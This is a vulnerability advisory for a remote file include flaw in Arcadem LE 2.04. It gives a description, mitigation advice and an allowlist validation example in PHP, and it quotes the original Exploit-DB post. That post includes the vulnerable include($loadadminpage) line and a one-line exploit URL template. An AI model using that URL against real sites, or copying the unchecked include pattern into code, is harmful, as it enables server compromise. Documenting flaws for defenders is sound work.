Vendor: Arcadem LE
By: KnocKout
CVSS: 5.5 (MEDIUM)
CWE: Remote File Include
Product Name: Arcadem LE
Affected Version From: 02.04
Affected Version To: 02.04
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Arcadem LE <= 2.04 Remote File Include Vulnerability

The vulnerability is in the admin/frontpage_right.php file of Arcadem LE version 2.04, which passes the 'loadadminpage' URL parameter directly to PHP's include() without any validation. An attacker who can reach the script therefore controls which file is included.

Mitigation:

The vendor should release a patch or an updated version of the script to fix the vulnerability. In the meantime, users can mitigate the risk by restricting access to the affected file or by validating and sanitizing the 'loadadminpage' value before it reaches include().
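
One way to implement the input validation mentioned above, as an added example that is not Arcadem LE code or a vendor patch: the request value is used only as a key into a fixed allowlist and never as a path. The page names and the pages/ directory are hypothetical; only the 'loadadminpage' parameter name comes from the advisory.

```php
<?php
// Added example, not Arcadem LE code. Page names and the pages/ directory
// are hypothetical; only the 'loadadminpage' parameter is from the advisory.

// Fixed map of accepted keys to files shipped with the application.
const ADMIN_PAGES = [
    'stats'    => 'stats.php',
    'settings' => 'settings.php',
];

// Return the absolute path to include for a requested key, or null.
function resolve_admin_page($requested, array $allowed, string $baseDir): ?string
{
    // Only an exact string key of the map is accepted; URLs, ../ paths,
    // arrays (?loadadminpage[]=x) and missing values all fail here.
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    // realpath() fails for missing files; the prefix check catches a map
    // entry or symlink that resolves outside the base directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from $_GET instead of relying on a bare global.
$requested = $_GET['loadadminpage'] ?? null;
$target = resolve_admin_page($requested, ADMIN_PAGES, __DIR__ . '/pages');

if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

Keeping allow_url_include set to Off in php.ini (the default since PHP 5.2) blocks remote URLs in include() as defense in depth, but it does not stop inclusion of local files, so the allowlist is still needed.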
Source

Exploit-DB raw data:

Arcadem LE <= 2.04 Remote File Include Vulnerability

 

Author : KnocKout
Greetz to : CoRSaNTuRK , BORDO , CWneSTer , By-Ajan , User , 44ahmetov , CoBRa_21 , Khirash , CWSearcher , idam
Cyber-Warrior / CW Exploiter TIM

--------------------------------------

Script : Arcadem LE
Version : 2.04
Download : http://www.agaresmedia.com/downloads/Arcadem_LE_2.04.zip

=======================================================

Vulnerability in frontpage_right.php ;


  <?PHP include($loadadminpage); ?>


Exploit : http://localsite/path/admin/frontpage_right.php?loadadminpage=[File]

=========================================================

# milw0rm.com [2007-12-21]